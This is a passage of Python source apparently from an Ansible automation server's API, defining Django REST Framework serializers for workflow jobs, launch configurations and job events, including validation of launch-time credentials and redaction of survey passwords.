'ask_inventory_on_launch',)\n\n def get_related(self, obj):\n res = super(WorkflowJobTemplateSerializer, self).get_related(obj)\n res.update(dict(\n workflow_jobs = self.reverse('api:workflow_job_template_jobs_list', kwargs={'pk': obj.pk}),\n schedules = self.reverse('api:workflow_job_template_schedules_list', kwargs={'pk': obj.pk}),\n launch = self.reverse('api:workflow_job_template_launch', kwargs={'pk': obj.pk}),\n workflow_nodes = self.reverse('api:workflow_job_template_workflow_nodes_list', kwargs={'pk': obj.pk}),\n labels = self.reverse('api:workflow_job_template_label_list', kwargs={'pk': obj.pk}),\n activity_stream = self.reverse('api:workflow_job_template_activity_stream_list', kwargs={'pk': obj.pk}),\n notification_templates_any = self.reverse('api:workflow_job_template_notification_templates_any_list', kwargs={'pk': obj.pk}),\n notification_templates_success = self.reverse('api:workflow_job_template_notification_templates_success_list', kwargs={'pk': obj.pk}),\n notification_templates_error = self.reverse('api:workflow_job_template_notification_templates_error_list', kwargs={'pk': obj.pk}),\n access_list = self.reverse('api:workflow_job_template_access_list', kwargs={'pk': obj.pk}),\n object_roles = self.reverse('api:workflow_job_template_object_roles_list', kwargs={'pk': obj.pk}),\n survey_spec = self.reverse('api:workflow_job_template_survey_spec', kwargs={'pk': obj.pk}),\n copy = self.reverse('api:workflow_job_template_copy', kwargs={'pk': obj.pk}),\n ))\n if obj.organization:\n res['organization'] = self.reverse('api:organization_detail', kwargs={'pk': obj.organization.pk})\n return res\n\n def validate_extra_vars(self, value):\n return vars_validate_or_raise(value)\n\n\nclass WorkflowJobTemplateWithSpecSerializer(WorkflowJobTemplateSerializer):\n '''\n Used for activity stream entries.\n '''\n\n class Meta:\n model = WorkflowJobTemplate\n fields = ('*', 'survey_spec')\n\n\nclass WorkflowJobSerializer(LabelsListMixin, UnifiedJobSerializer):\n\n class Meta:\n model = WorkflowJob\n fields = ('*', 'workflow_job_template', 'extra_vars', 'allow_simultaneous',\n 'job_template', 'is_sliced_job',\n '-execution_node', '-event_processing_finished', '-controller_node',\n 'inventory',)\n\n def get_related(self, obj):\n res = super(WorkflowJobSerializer, self).get_related(obj)\n if obj.workflow_job_template:\n res['workflow_job_template'] = self.reverse('api:workflow_job_template_detail',\n kwargs={'pk': obj.workflow_job_template.pk})\n res['notifications'] = self.reverse('api:workflow_job_notifications_list', kwargs={'pk': obj.pk})\n if obj.job_template_id:\n res['job_template'] = self.reverse('api:job_template_detail', kwargs={'pk': obj.job_template_id})\n res['workflow_nodes'] = self.reverse('api:workflow_job_workflow_nodes_list', kwargs={'pk': obj.pk})\n res['labels'] = self.reverse('api:workflow_job_label_list', kwargs={'pk': obj.pk})\n res['activity_stream'] = self.reverse('api:workflow_job_activity_stream_list', kwargs={'pk': obj.pk})\n res['relaunch'] = self.reverse('api:workflow_job_relaunch', kwargs={'pk': obj.pk})\n if obj.can_cancel or True:\n res['cancel'] = self.reverse('api:workflow_job_cancel', kwargs={'pk': obj.pk})\n return res\n\n def to_representation(self, obj):\n ret = super(WorkflowJobSerializer, self).to_representation(obj)\n if obj is None:\n return ret\n if 'extra_vars' in ret:\n ret['extra_vars'] = obj.display_extra_vars()\n return ret\n\n\nclass WorkflowJobListSerializer(WorkflowJobSerializer, UnifiedJobListSerializer):\n\n class Meta:\n fields = ('*', '-execution_node', '-controller_node',)\n\n\nclass WorkflowJobCancelSerializer(WorkflowJobSerializer):\n\n can_cancel = serializers.BooleanField(read_only=True)\n\n class Meta:\n fields = ('can_cancel',)\n\n\nclass LaunchConfigurationBaseSerializer(BaseSerializer):\n job_type = serializers.ChoiceField(allow_blank=True, allow_null=True, required=False, default=None,\n choices=NEW_JOB_TYPE_CHOICES)\n job_tags = serializers.CharField(allow_blank=True, allow_null=True, required=False, default=None)\n limit = serializers.CharField(allow_blank=True, allow_null=True, required=False, default=None)\n skip_tags = serializers.CharField(allow_blank=True, allow_null=True, required=False, default=None)\n diff_mode = serializers.NullBooleanField(required=False, default=None)\n verbosity = serializers.ChoiceField(allow_null=True, required=False, default=None,\n choices=VERBOSITY_CHOICES)\n exclude_errors = ()\n\n class Meta:\n fields = ('*', 'extra_data', 'inventory', # Saved launch-time config fields\n 'job_type', 'job_tags', 'skip_tags', 'limit', 'skip_tags', 'diff_mode', 'verbosity')\n\n def get_related(self, obj):\n res = super(LaunchConfigurationBaseSerializer, self).get_related(obj)\n if obj.inventory_id:\n res['inventory'] = self.reverse('api:inventory_detail', kwargs={'pk': obj.inventory_id})\n res['credentials'] = self.reverse(\n 'api:{}_credentials_list'.format(get_type_for_model(self.Meta.model)),\n kwargs={'pk': obj.pk}\n )\n return res\n\n def _build_mock_obj(self, attrs):\n mock_obj = self.Meta.model()\n if self.instance:\n for field in self.instance._meta.fields:\n setattr(mock_obj, field.name, getattr(self.instance, field.name))\n field_names = set(field.name for field in self.Meta.model._meta.fields)\n for field_name, value in list(attrs.items()):\n setattr(mock_obj, field_name, value)\n if field_name not in field_names:\n attrs.pop(field_name)\n return mock_obj\n\n def to_representation(self, obj):\n ret = super(LaunchConfigurationBaseSerializer, self).to_representation(obj)\n if obj is None:\n return ret\n if 'extra_data' in ret and obj.survey_passwords:\n ret['extra_data'] = obj.display_extra_vars()\n return ret\n\n def get_summary_fields(self, obj):\n summary_fields = super(LaunchConfigurationBaseSerializer, self).get_summary_fields(obj)\n # Credential would be an empty dictionary in this case\n summary_fields.pop('credential', None)\n return summary_fields\n\n def validate(self, attrs):\n db_extra_data = {}\n if self.instance:\n db_extra_data = parse_yaml_or_json(self.instance.extra_data)\n\n attrs = super(LaunchConfigurationBaseSerializer, self).validate(attrs)\n\n ujt = None\n if 'unified_job_template' in attrs:\n ujt = attrs['unified_job_template']\n elif self.instance:\n ujt = self.instance.unified_job_template\n\n # build additional field survey_passwords to track redacted variables\n password_dict = {}\n extra_data = parse_yaml_or_json(attrs.get('extra_data', {}))\n if hasattr(ujt, 'survey_password_variables'):\n # Prepare additional field survey_passwords for save\n for key in ujt.survey_password_variables():\n if key in extra_data:\n password_dict[key] = REPLACE_STR\n\n # Replace $encrypted$ submissions with db value if exists\n if 'extra_data' in attrs:\n if password_dict:\n if not self.instance or password_dict != self.instance.survey_passwords:\n attrs['survey_passwords'] = password_dict.copy()\n # Force dict type (cannot preserve YAML formatting if passwords are involved)\n # Encrypt the extra_data for save, only current password vars in JT survey\n # but first, make a copy or else this is referenced by request.data, and\n # user could get encrypted string in form data in API browser\n attrs['extra_data'] = extra_data.copy()\n encrypt_dict(attrs['extra_data'], password_dict.keys())\n # For any raw $encrypted$ string, either\n # - replace with existing DB value\n # - raise a validation error\n # - ignore, if default present\n for key in password_dict.keys():\n if attrs['extra_data'].get(key, None) == REPLACE_STR:\n if key not in db_extra_data:\n element = ujt.pivot_spec(ujt.survey_spec)[key]\n # NOTE: validation _of_ the default values of password type\n # questions not done here or on launch, but doing so could\n # leak info about values, so it should not be added\n if not ('default' in element and element['default']):\n raise serializers.ValidationError(\n {\"extra_data\": _('Provided variable {} has no database value to replace with.').format(key)})\n else:\n attrs['extra_data'][key] = db_extra_data[key]\n\n # Build unsaved version of this config, use it to detect prompts errors\n mock_obj = self._build_mock_obj(attrs)\n accepted, rejected, errors = ujt._accept_or_ignore_job_kwargs(\n _exclude_errors=self.exclude_errors, **mock_obj.prompts_dict())\n\n # Remove all unprocessed $encrypted$ strings, indicating default usage\n if 'extra_data' in attrs and password_dict:\n for key, value in attrs['extra_data'].copy().items():\n if value == REPLACE_STR:\n if key in password_dict:\n attrs['extra_data'].pop(key)\n attrs.get('survey_passwords', {}).pop(key, None)\n else:\n errors.setdefault('extra_vars', []).append(\n _('\"$encrypted$ is a reserved keyword, may not be used for {var_name}.\"'.format(key))\n )\n\n # Launch configs call extra_vars extra_data for historical reasons\n if 'extra_vars' in errors:\n errors['extra_data'] = errors.pop('extra_vars')\n if errors:\n raise serializers.ValidationError(errors)\n\n # Model `.save` needs the container dict, not the psuedo fields\n if mock_obj.char_prompts:\n attrs['char_prompts'] = mock_obj.char_prompts\n\n return attrs\n\n\nclass WorkflowJobTemplateNodeSerializer(LaunchConfigurationBaseSerializer):\n credential = DeprecatedCredentialField()\n success_nodes = serializers.PrimaryKeyRelatedField(many=True, read_only=True)\n failure_nodes = serializers.PrimaryKeyRelatedField(many=True, read_only=True)\n always_nodes = serializers.PrimaryKeyRelatedField(many=True, read_only=True)\n exclude_errors = ('required',) # required variables may be provided by WFJT or on launch\n\n class Meta:\n model = WorkflowJobTemplateNode\n fields = ('*', 'credential', 'workflow_job_template', '-name', '-description', 'id', 'url', 'related',\n 'unified_job_template', 'success_nodes', 'failure_nodes', 'always_nodes',)\n\n def get_related(self, obj):\n res = super(WorkflowJobTemplateNodeSerializer, self).get_related(obj)\n res['success_nodes'] = self.reverse('api:workflow_job_template_node_success_nodes_list', kwargs={'pk': obj.pk})\n res['failure_nodes'] = self.reverse('api:workflow_job_template_node_failure_nodes_list', kwargs={'pk': obj.pk})\n res['always_nodes'] = self.reverse('api:workflow_job_template_node_always_nodes_list', kwargs={'pk': obj.pk})\n if obj.unified_job_template:\n res['unified_job_template'] = obj.unified_job_template.get_absolute_url(self.context.get('request'))\n try:\n res['workflow_job_template'] = self.reverse('api:workflow_job_template_detail', kwargs={'pk': obj.workflow_job_template.pk})\n except WorkflowJobTemplate.DoesNotExist:\n pass\n return res\n\n def build_field(self, field_name, info, model_class, nested_depth):\n # have to special-case the field so that DRF will not automagically make it\n # read-only because it's a property on the model.\n if field_name == 'credential':\n return self.build_standard_field(field_name,\n self.credential)\n return super(WorkflowJobTemplateNodeSerializer, self).build_field(field_name, info, model_class, nested_depth)\n\n def build_relational_field(self, field_name, relation_info):\n field_class, field_kwargs = super(WorkflowJobTemplateNodeSerializer, self).build_relational_field(field_name, relation_info)\n # workflow_job_template is read-only unless creating a new node.\n if self.instance and field_name == 'workflow_job_template':\n field_kwargs['read_only'] = True\n field_kwargs.pop('queryset', None)\n return field_class, field_kwargs\n\n def validate(self, attrs):\n deprecated_fields = {}\n if 'credential' in attrs: # TODO: remove when v2 API is deprecated\n deprecated_fields['credential'] = attrs.pop('credential')\n view = self.context.get('view')\n attrs = super(WorkflowJobTemplateNodeSerializer, self).validate(attrs)\n ujt_obj = None\n if 'unified_job_template' in attrs:\n ujt_obj = attrs['unified_job_template']\n elif self.instance:\n ujt_obj = self.instance.unified_job_template\n if 'credential' in deprecated_fields: # TODO: remove when v2 API is deprecated\n cred = deprecated_fields['credential']\n attrs['credential'] = cred\n if cred is not None:\n if not ujt_obj.ask_credential_on_launch:\n raise serializers.ValidationError({\"credential\": _(\n \"Related template is not configured to accept credentials on launch.\")})\n cred = Credential.objects.get(pk=cred)\n view = self.context.get('view', None)\n if (not view) or (not view.request) or (view.request.user not in cred.use_role):\n raise PermissionDenied()\n return attrs\n\n def create(self, validated_data): # TODO: remove when v2 API is deprecated\n deprecated_fields = {}\n if 'credential' in validated_data:\n deprecated_fields['credential'] = validated_data.pop('credential')\n obj = super(WorkflowJobTemplateNodeSerializer, self).create(validated_data)\n if 'credential' in deprecated_fields:\n if deprecated_fields['credential']:\n obj.credentials.add(deprecated_fields['credential'])\n return obj\n\n def update(self, obj, validated_data): # TODO: remove when v2 API is deprecated\n deprecated_fields = {}\n if 'credential' in validated_data:\n deprecated_fields['credential'] = validated_data.pop('credential')\n obj = super(WorkflowJobTemplateNodeSerializer, self).update(obj, validated_data)\n if 'credential' in deprecated_fields:\n existing = obj.credentials.filter(credential_type__kind='ssh')\n new_cred = deprecated_fields['credential']\n if new_cred not in existing:\n for cred in existing:\n obj.credentials.remove(cred)\n if new_cred:\n obj.credentials.add(new_cred)\n return obj\n\n\nclass WorkflowJobNodeSerializer(LaunchConfigurationBaseSerializer):\n credential = DeprecatedCredentialField()\n success_nodes = serializers.PrimaryKeyRelatedField(many=True, read_only=True)\n failure_nodes = serializers.PrimaryKeyRelatedField(many=True, read_only=True)\n always_nodes = serializers.PrimaryKeyRelatedField(many=True, read_only=True)\n\n class Meta:\n model = WorkflowJobNode\n fields = ('*', 'credential', 'job', 'workflow_job', '-name', '-description', 'id', 'url', 'related',\n 'unified_job_template', 'success_nodes', 'failure_nodes', 'always_nodes',\n 'do_not_run',)\n\n def get_related(self, obj):\n res = super(WorkflowJobNodeSerializer, self).get_related(obj)\n res['success_nodes'] = self.reverse('api:workflow_job_node_success_nodes_list', kwargs={'pk': obj.pk})\n res['failure_nodes'] = self.reverse('api:workflow_job_node_failure_nodes_list', kwargs={'pk': obj.pk})\n res['always_nodes'] = self.reverse('api:workflow_job_node_always_nodes_list', kwargs={'pk': obj.pk})\n if obj.unified_job_template:\n res['unified_job_template'] = obj.unified_job_template.get_absolute_url(self.context.get('request'))\n if obj.job:\n res['job'] = obj.job.get_absolute_url(self.context.get('request'))\n if obj.workflow_job:\n res['workflow_job'] = self.reverse('api:workflow_job_detail', kwargs={'pk': obj.workflow_job.pk})\n return res\n\n\nclass WorkflowJobNodeListSerializer(WorkflowJobNodeSerializer):\n pass\n\n\nclass WorkflowJobNodeDetailSerializer(WorkflowJobNodeSerializer):\n pass\n\n\nclass WorkflowJobTemplateNodeDetailSerializer(WorkflowJobTemplateNodeSerializer):\n '''\n Influence the api browser sample data to not include workflow_job_template\n when editing a WorkflowNode.\n\n Note: I was not able to accomplish this through the use of extra_kwargs.\n Maybe something to do with workflow_job_template being a relational field?\n '''\n def build_relational_field(self, field_name, relation_info):\n field_class, field_kwargs = super(WorkflowJobTemplateNodeDetailSerializer, self).build_relational_field(field_name, relation_info)\n if self.instance and field_name == 'workflow_job_template':\n field_kwargs['read_only'] = True\n field_kwargs.pop('queryset', None)\n return field_class, field_kwargs\n\n\nclass JobListSerializer(JobSerializer, UnifiedJobListSerializer):\n pass\n\n\nclass AdHocCommandListSerializer(AdHocCommandSerializer, UnifiedJobListSerializer):\n pass\n\n\nclass SystemJobListSerializer(SystemJobSerializer, UnifiedJobListSerializer):\n\n class Meta:\n model = SystemJob\n fields = ('*', '-controller_node') # field removal undone by UJ serializer\n\n\nclass JobHostSummarySerializer(BaseSerializer):\n\n class Meta:\n model = JobHostSummary\n fields = ('*', '-name', '-description', 'job', 'host', 'host_name', 'changed',\n 'dark', 'failures', 'ok', 'processed', 'skipped', 'failed',\n 'ignored', 'rescued')\n\n def get_related(self, obj):\n res = super(JobHostSummarySerializer, self).get_related(obj)\n res.update(dict(\n job=self.reverse('api:job_detail', kwargs={'pk': obj.job.pk})))\n if obj.host is not None:\n res.update(dict(\n host=self.reverse('api:host_detail', kwargs={'pk': obj.host.pk})\n ))\n return res\n\n def get_summary_fields(self, obj):\n d = super(JobHostSummarySerializer, self).get_summary_fields(obj)\n try:\n d['job']['job_template_id'] = obj.job.job_template.id\n d['job']['job_template_name'] = obj.job.job_template.name\n except (KeyError, AttributeError):\n pass\n return d\n\n\nclass JobEventSerializer(BaseSerializer):\n\n event_display = serializers.CharField(source='get_event_display2', read_only=True)\n event_level = serializers.IntegerField(read_only=True)\n\n class Meta:\n model = JobEvent\n fields = ('*', '-name', '-description', 'job', 'event', 'counter',\n 'event_display', 'event_data', 'event_level', 'failed',\n 'changed', 'uuid', 'parent_uuid', 'host', 'host_name', 'parent',\n 'playbook', 'play', 'task', 'role', 'stdout', 'start_line', 'end_line',\n 'verbosity')\n\n def get_related(self, obj):\n res = super(JobEventSerializer, self).get_related(obj)\n res.update(dict(\n job = self.reverse('api:job_detail', kwargs={'pk': obj.job_id}),\n ))\n if obj.parent_id:\n res['parent'] = self.reverse('api:job_event_detail', kwargs={'pk': obj.parent_id})\n res['children'] = self.reverse('api:job_event_children_list', kwargs={'pk': obj.pk})\n if obj.host_id:\n res['host'] = self.reverse('api:host_detail', kwargs={'pk': obj.host_id})\n if obj.hosts.exists():\n res['hosts'] = self.reverse('api:job_event_hosts_list', kwargs={'pk': obj.pk})\n return res\n\n def get_summary_fields(self, obj):\n d = super(JobEventSerializer, self).get_summary_fields(obj)\n try:\n d['job']['job_template_id'] = obj.job.job_template.id\n d['job']['job_template_name'] = obj.job.job_template.name\n except (KeyError, AttributeError):\n pass\n return d\n\n def to_representation(self, obj):\n ret = super(JobEventSerializer, self).to_representation(obj)\n # Show full stdout for event detail view, truncate only for list view.\n if hasattr(self.context.get('view', None), 'retrieve'):\n return ret\n # Show full stdout for playbook_on_* events.\n if obj and obj.event.startswith('playbook_on'):\n return ret\n max_bytes = settings.EVENT_STDOUT_MAX_BYTES_DISPLAY\n if max_bytes > 0 and 'stdout' in ret and len(ret['stdout']) >= max_bytes:\n ret['stdout'] = ret['stdout'][:(max_bytes - 1)] + u'\\u2026'\n set_count = 0\n reset_count = 0\n for m in ANSI_SGR_PATTERN.finditer(ret['stdout']):\n if m.string[m.start():m.end()] == u'\\u001b[0m':\n reset_count += 1\n else:\n set_count += 1\n ret['stdout'] += u'\\u001b[0m' * (set_count - reset_count)\n return ret\n\n\nclass JobEventWebSocketSerializer(JobEventSerializer):\n created = serializers.SerializerMethodField()\n modified = serializers.SerializerMethodField()\n event_name = serializers.CharField(source='event')\n group_name = serializers.SerializerMethodField()\n\n class Meta:\n model = JobEvent\n fields = ('*', 'event_name', 'group_name',)\n\n def get_created(self, obj):\n return obj.created.isoformat()\n\n def get_modified(self, obj):\n return obj.modified.isoformat()\n\n def get_group_name(self, obj):\n return 'job_events'\n\n\nclass ProjectUpdateEventSerializer(JobEventSerializer):\n stdout = serializers.SerializerMethodField()\n event_data = serializers.SerializerMethodField()\n\n class Meta:\n model = ProjectUpdateEvent\n fields = ('*', '-name', '-description', '-job', '-job_id',\n '-parent_uuid', '-parent', '-host', 'project_update')\n\n def get_related(self, obj):\n res = super(JobEventSerializer, self).get_related(obj)\n res['project_update'] = self.reverse(\n 'api:project_update_detail', kwargs={'pk': obj.project_update_id}\n )\n return res\n\n def get_stdout(self, obj):\n return UriCleaner.remove_sensitive(obj.stdout)\n\n def get_event_data(self, obj):\n try:\n return json.loads(\n UriCleaner.remove_sensitive(\n json.dumps(obj.event_data)\n )\n )\n except Exception:\n logger.exception(\"Failed to sanitize event_data\")\n return {}\n\n\nclass ProjectUpdateEventWebSocketSerializer(ProjectUpdateEventSerializer):\n created = serializers.SerializerMethodField()\n modified = serializers.SerializerMethodField()\n event_name = serializers.CharField(source='event')\n group_name = serializers.SerializerMethodField()\n\n class Meta:\n model = ProjectUpdateEvent\n fields = ('*', 'event_name', 'group_name',)\n\n def get_created(self, obj):\n return obj.created.isoformat()\n\n def get_modified(self, obj):\n return obj.modified.isoformat()\n\n def get_group_name(self, obj):\n return 'project_update_events'\n\n\nclass AdHocCommandEventSerializer(BaseSerializer):\n\n event_display = serializers.CharField(source='get_event_display', read_only=True)\n\n class Meta:\n model = AdHocCommandEvent\n fields = ('*', '-name', '-description', 'ad_hoc_command', 'event',\n 'counter', 'event_display', 'event_data', 'failed',\n 'changed', 'uuid', 'host', 'host_name', 'stdout',\n 'start_line', 'end_line', 'verbosity')\n\n def get_related(self, obj):\n res = super(AdHocCommandEventSerializer, self).get_related(obj)\n res.update(dict(\n ad_hoc_command = self.reverse('api:ad_hoc_command_detail', kwargs={'pk': obj.ad_hoc_command_id}),\n ))\n if obj.host:\n res['host'] = self.reverse('api:host_detail', kwargs={'pk': obj.host.pk})\n return res\n\n def to_representation(self, obj):\n ret = super(AdHocCommandEventSerializer, self).to_representation(obj)\n # Show full stdout for event detail view, truncate only for list view.\n if hasattr(self.context.get('view', None), 'retrieve'):\n return ret\n max_bytes = settings.EVENT_STDOUT_MAX_BYTES_DISPLAY\n if max_bytes > 0 and 'stdout' in ret and len(ret['stdout']) >= max_bytes:\n ret['stdout'] = ret['stdout'][:(max_bytes - 1)] + u'\\u2026'\n set_count = 0\n reset_count = 0\n for m in ANSI_SGR_PATTERN.finditer(ret['stdout']):\n if m.string[m.start():m.end()] == u'\\u001b[0m':\n reset_count += 1\n else:\n set_count += 1\n ret['stdout'] += u'\\u001b[0m' * (set_count - reset_count)\n return ret\n\n\nclass AdHocCommandEventWebSocketSerializer(AdHocCommandEventSerializer):\n created = serializers.SerializerMethodField()\n modified = serializers.SerializerMethodField()\n event_name = serializers.CharField(source='event')\n group_name = serializers.SerializerMethodField()\n\n class Meta:\n model = AdHocCommandEvent\n fields = ('*', 'event_name', 'group_name',)\n\n def get_created(self, obj):\n return obj.created.isoformat()\n\n def get_modified(self, obj):\n return obj.modified.isoformat()\n\n def get_group_name(self, obj):\n return 'ad_hoc_command_events'\n\n\nclass InventoryUpdateEventSerializer(AdHocCommandEventSerializer):\n\n class Meta:\n model = InventoryUpdateEvent\n fields = ('*', '-name', '-description', '-ad_hoc_command', '-host',\n '-host_name', 'inventory_update')\n\n def get_related(self, obj):\n res = super(AdHocCommandEventSerializer, self).get_related(obj)\n res['inventory_update'] = self.reverse(\n 'api:inventory_update_detail', kwargs={'pk': obj.inventory_update_id}\n )\n return res\n\n\nclass InventoryUpdateEventWebSocketSerializer(InventoryUpdateEventSerializer):\n created = serializers.SerializerMethodField()\n modified = serializers.SerializerMethodField()\n event_name = serializers.CharField(source='event')\n group_name = serializers.SerializerMethodField()\n\n class Meta:\n model = InventoryUpdateEvent\n fields = ('*', 'event_name', 'group_name',)\n\n def get_created(self, obj):\n return obj.created.isoformat()\n\n def get_modified(self, obj):\n return obj.modified.isoformat()\n\n def get_group_name(self, obj):\n return 'inventory_update_events'\n\n\nclass SystemJobEventSerializer(AdHocCommandEventSerializer):\n\n class Meta:\n model = SystemJobEvent\n fields = ('*', '-name', '-description', '-ad_hoc_command', '-host',\n '-host_name', 'system_job')\n\n def get_related(self, obj):\n res = super(AdHocCommandEventSerializer, self).get_related(obj)\n res['system_job'] = self.reverse(\n 'api:system_job_detail', kwargs={'pk': obj.system_job_id}\n )\n return res\n\n\nclass SystemJobEventWebSocketSerializer(SystemJobEventSerializer):\n created = serializers.SerializerMethodField()\n modified = serializers.SerializerMethodField()\n event_name = serializers.CharField(source='event')\n group_name = serializers.SerializerMethodField()\n\n class Meta:\n model = SystemJobEvent\n fields = ('*', 'event_name', 'group_name',)\n\n def get_created(self, obj):\n return obj.created.isoformat()\n\n def get_modified(self, obj):\n return obj.modified.isoformat()\n\n def get_group_name(self, obj):\n return 'system_job_events'\n\n\nclass JobLaunchSerializer(BaseSerializer):\n\n # Representational fields\n passwords_needed_to_start = serializers.ReadOnlyField()\n can_start_without_user_input = serializers.BooleanField(read_only=True)\n variables_needed_to_start = serializers.ReadOnlyField()\n credential_needed_to_start = serializers.SerializerMethodField()\n inventory_needed_to_start = serializers.SerializerMethodField()\n survey_enabled = serializers.SerializerMethodField()\n job_template_data = serializers.SerializerMethodField()\n defaults = serializers.SerializerMethodField()\n\n # Accepted on launch fields\n extra_vars = serializers.JSONField(required=False, write_only=True)\n inventory = serializers.PrimaryKeyRelatedField(\n queryset=Inventory.objects.all(),\n required=False, write_only=True\n )\n credentials = serializers.PrimaryKeyRelatedField(\n many=True, queryset=Credential.objects.all(),\n required=False, write_only=True\n )\n credential_passwords = VerbatimField(required=False, write_only=True)\n diff_mode = serializers.BooleanField(required=False, write_only=True)\n job_tags = serializers.CharField(required=False, write_only=True, allow_blank=True)\n job_type = serializers.ChoiceField(required=False, choices=NEW_JOB_TYPE_CHOICES, write_only=True)\n skip_tags = serializers.CharField(required=False, write_only=True, allow_blank=True)\n limit = serializers.CharField(required=False, write_only=True, allow_blank=True)\n verbosity = serializers.ChoiceField(required=False, choices=VERBOSITY_CHOICES, write_only=True)\n\n class Meta:\n model = JobTemplate\n fields = ('can_start_without_user_input', 'passwords_needed_to_start',\n 'extra_vars', 'inventory', 'limit', 'job_tags', 'skip_tags', 'job_type', 'verbosity', 'diff_mode',\n 'credentials', 'credential_passwords', 'ask_variables_on_launch', 'ask_tags_on_launch',\n 'ask_diff_mode_on_launch', 'ask_skip_tags_on_launch', 'ask_job_type_on_launch', 'ask_limit_on_launch',\n 'ask_verbosity_on_launch', 'ask_inventory_on_launch', 'ask_credential_on_launch',\n 'survey_enabled', 'variables_needed_to_start', 'credential_needed_to_start',\n 'inventory_needed_to_start', 'job_template_data', 'defaults', 'verbosity')\n read_only_fields = (\n 'ask_diff_mode_on_launch', 'ask_variables_on_launch', 'ask_limit_on_launch', 'ask_tags_on_launch',\n 'ask_skip_tags_on_launch', 'ask_job_type_on_launch', 'ask_verbosity_on_launch',\n 'ask_inventory_on_launch', 'ask_credential_on_launch',)\n\n def get_credential_needed_to_start(self, obj):\n return False\n\n def get_inventory_needed_to_start(self, obj):\n return not (obj and obj.inventory)\n\n def get_survey_enabled(self, obj):\n if obj:\n return obj.survey_enabled and 'spec' in obj.survey_spec\n return False\n\n def get_defaults(self, obj):\n defaults_dict = {}\n for field_name in JobTemplate.get_ask_mapping().keys():\n if field_name == 'inventory':\n defaults_dict[field_name] = dict(\n name=getattrd(obj, '%s.name' % field_name, None),\n id=getattrd(obj, '%s.pk' % field_name, None))\n elif field_name == 'credentials':\n for cred in obj.credentials.all():\n cred_dict = dict(\n id=cred.id,\n name=cred.name,\n credential_type=cred.credential_type.pk,\n passwords_needed=cred.passwords_needed\n )\n if cred.credential_type.managed_by_tower and 'vault_id' in cred.credential_type.defined_fields:\n cred_dict['vault_id'] = cred.get_input('vault_id', default=None)\n defaults_dict.setdefault(field_name, []).append(cred_dict)\n else:\n defaults_dict[field_name] = getattr(obj, field_name)\n return defaults_dict\n\n def get_job_template_data(self, obj):\n return dict(name=obj.name, id=obj.id, description=obj.description)\n\n def validate_extra_vars(self, value):\n return vars_validate_or_raise(value)\n\n def validate(self, attrs):\n template = self.context.get('template')\n\n accepted, rejected, errors = template._accept_or_ignore_job_kwargs(\n _exclude_errors=['prompts'], # make several error types non-blocking\n **attrs)\n self._ignored_fields = rejected\n\n if template.inventory and template.inventory.pending_deletion is True:\n errors['inventory'] = _(\"The inventory associated with this Job Template is being deleted.\")\n elif 'inventory' in accepted and accepted['inventory'].pending_deletion:\n errors['inventory'] = _(\"The provided inventory is being deleted.\")\n\n # Prohibit providing multiple credentials of the same CredentialType.kind\n # or multiples of same vault id\n distinct_cred_kinds = []\n for cred in accepted.get('credentials', []):\n if cred.unique_hash() in distinct_cred_kinds:\n errors.setdefault('credentials', []).append(_(\n 'Cannot assign multiple {} credentials.'\n ).format(cred.unique_hash(display=True)))\n if cred.credential_type.kind not in ('ssh', 'vault', 'cloud', 'net'):\n errors.setdefault('credentials', []).append(_(\n 'Cannot assign a Credential of kind `{}`'\n ).format(cred.credential_type.kind))\n distinct_cred_kinds.append(cred.unique_hash())\n\n # Prohibit removing credentials from the JT list (unsupported for now)\n template_credentials = template.credentials.all()\n if 'credentials' in attrs:\n removed_creds = set(template_credentials) - set(attrs['credentials'])\n provided_mapping = Credential.unique_dict(attrs['credentials'])\n for cred in removed_creds:\n if cred.unique_hash() in provided_mapping.keys():\n continue # User replaced credential with new of same type\n errors.setdefault('credentials', []).append(_(\n 'Removing {} credential at launch time without replacement is not supported. '\n 'Provided list lacked credential(s): {}.'\n ).format(cred.unique_hash(display=True), ', '.join([str(c) for c in removed_creds])))\n\n # verify that credentials (either provided or existing) don't\n # require launch-time passwords that have not been provided\n if 'credentials' in accepted:\n launch_credentials = accepted['credentials']\n else:\n launch_credentials = template_credentials\n passwords = attrs.get('credential_passwords', {}) # get from original attrs\n passwords_lacking = []\n for cred in launch_credentials:\n for p in cred.passwords_needed:\n if p not in passwords:\n passwords_lacking.append(p)\n else:\n accepted.setdefault('credential_passwords', {})\n accepted['credential_passwords'][p] = passwords[p]\n if len(passwords_lacking):\n errors['passwords_needed_to_start'] = passwords_lacking\n\n if errors:\n raise serializers.ValidationError(errors)\n\n if 'extra_vars' in accepted:\n extra_vars_save = accepted['extra_vars']\n else:\n extra_vars_save = None\n # Validate job against JobTemplate clean_ methods\n accepted = super(JobLaunchSerializer, self).validate(accepted)\n # Preserve extra_vars as dictionary internally\n if extra_vars_save:\n accepted['extra_vars'] = extra_vars_save\n\n return accepted\n\n\nclass WorkflowJobLaunchSerializer(BaseSerializer):\n\n can_start_without_user_input = serializers.BooleanField(read_only=True)\n defaults = serializers.SerializerMethodField()\n variables_needed_to_start = serializers.ReadOnlyField()\n survey_enabled = serializers.SerializerMethodField()\n extra_vars = VerbatimField(required=False, write_only=True)\n inventory = serializers.PrimaryKeyRelatedField(\n queryset=Inventory.objects.all(),\n required=False, write_only=True\n )\n workflow_job_template_data = serializers.SerializerMethodField()\n\n class Meta:\n model = WorkflowJobTemplate\n fields = ('ask_inventory_on_launch', 'can_start_without_user_input', 'defaults', 'extra_vars',\n 'inventory', 'survey_enabled', 'variables_needed_to_start',\n 'node_templates_missing', 'node_prompts_rejected',\n 'workflow_job_template_data', 'survey_enabled', 'ask_variables_on_launch')\n read_only_fields = ('ask_inventory_on_launch', 'ask_variables_on_launch')\n\n def get_survey_enabled(self, obj):\n if obj:\n return obj.survey_enabled and 'spec' in obj.survey_spec\n return False\n\n def get_defaults(self, obj):\n defaults_dict = {}\n for field_name in WorkflowJobTemplate.get_ask_mapping().keys():\n if field_name == 'inventory':\n defaults_dict[field_name] = dict(\n name=getattrd(obj, '%s.name' % field_name, None),\n id=getattrd(obj, '%s.pk' % field_name, None))\n else:\n defaults_dict[field_name] = getattr(obj, field_name)\n return defaults_dict\n\n def get_workflow_job_template_data(self, obj):\n return dict(name=obj.name, id=obj.id, description=obj.description)\n\n def validate(self, attrs):\n template = self.instance\n\n accepted, rejected, errors = template._accept_or_ignore_job_kwargs(**attrs)\n self._ignored_fields = rejected\n\n if template.inventory and template.inventory.pending_deletion is True:\n errors['inventory'] = _(\"The inventory associated with this Workflow is being deleted.\")\n elif 'inventory' in accepted and accepted['inventory'].pending_deletion:\n errors['inventory'] = _(\"The provided inventory is being deleted.\")\n\n if errors:\n raise 